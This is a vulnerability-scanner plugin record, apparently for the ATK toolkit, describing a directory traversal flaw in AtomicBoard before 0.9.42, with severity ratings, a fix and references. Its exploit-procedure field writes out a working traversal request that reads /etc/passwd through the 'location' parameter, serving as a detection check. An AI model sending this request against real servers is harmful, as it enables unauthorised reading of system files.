<plugin_id>17</plugin_id>
<plugin_name>AtomicBoard prior 0.9.42 Directory Traversal</plugin_name>
<plugin_family>CGI</plugin_family>
<plugin_created_date>2003/11/13</plugin_created_date>
<plugin_created_name>Marc Ruef</plugin_created_name>
<plugin_created_email>marc dot ruef at computec dot ch</plugin_created_email>
<plugin_created_web>http://www.computec.ch</plugin_created_web>
<plugin_created_company>computec.ch</plugin_created_company>
<plugin_updated_name>Marc Ruef</plugin_updated_name>
<plugin_updated_email>marc dot ruef at computec dot ch</plugin_updated_email>
<plugin_updated_web>http://www.computec.ch</plugin_updated_web>
<plugin_updated_company>computec.ch</plugin_updated_company>
<plugin_updated_date>2004/11/13</plugin_updated_date>
<plugin_version>2.0</plugin_version>
<plugin_changelog>Changed the Vulnerability Class into Directory Traversal and also the plugin name in version 1.3. Enhanced the solution in version 1.4. Corrected the plugin structure and added the accuracy values in 1.5. Improved the pattern matching and added the changelog in 2.0</plugin_changelog>
<plugin_protocol>tcp</plugin_protocol>
<plugin_port>80</plugin_port>
<plugin_procedure_exploit>open|send /atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd HTTP/1.0\n\n|sleep|close|pattern_exists HTTP/#.# ### *root:*</plugin_procedure_exploit>
<plugin_exploit_accuracy>99</plugin_exploit_accuracy>
<plugin_comment>This plugin was written with the ATK Attack Editor.</plugin_comment>
<bug_published_name>gr00vy</bug_published_name>
<bug_published_date>2003/07/25</bug_published_date>
<bug_produced_name>AtomicBoard Team</bug_produced_name>
<bug_produced_web>http://cal007300.student.utwente.nl/atomicboard/</bug_produced_web>
<bug_affected>AtomicBoard prior 0.9.42</bug_affected>
<bug_not_affected>AtomicBoard 0.9.42 and newer</bug_not_affected>
<bug_vulnerability_class>Directory Traversal</bug_vulnerability_class>
<bug_description>The AtomicBoard is a set of PHP scripts. These provide the functionality of a web board. There is the possibility to read arbitrary files on the host by supplying a filename to the 'location' argument of the file index.php.</bug_description>
<bug_solution>Do not use Atomic Board yet. The developer does not recommend the use of Atomic Board in production systems. The project has been stopped. Or you habe to upgrade to AtomicBoard 0.9.42. Then also limit unwanted connections and communications with firewalling if possible.</bug_solution>
<bug_fixing_time>30 minutes</bug_fixing_time>
<bug_exploit_availability>Yes</bug_exploit_availability>
<bug_exploit_url>http://www.securityfocus.com/bid/8236/exploit/</bug_exploit_url>
<bug_remote>Yes</bug_remote>
<bug_local>Yes</bug_local>
<bug_severity>High</bug_severity>
<bug_popularity>7</bug_popularity>
<bug_simplicity>7</bug_simplicity>
<bug_impact>8</bug_impact>
<bug_risk>7</bug_risk>
<bug_nessus_risk>Serious</bug_nessus_risk>
<bug_check_tool>Nessus is able to do the same check.</bug_check_tool>
<source_securityfocus_bid>8236</source_securityfocus_bid>
<source_secunia_id>9355</source_secunia_id>
<source_nessus_id>11795</source_nessus_id>
<source_literature>Hacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427</source_literature>
<source_misc>http://secunia.com/product/1906/</source_misc>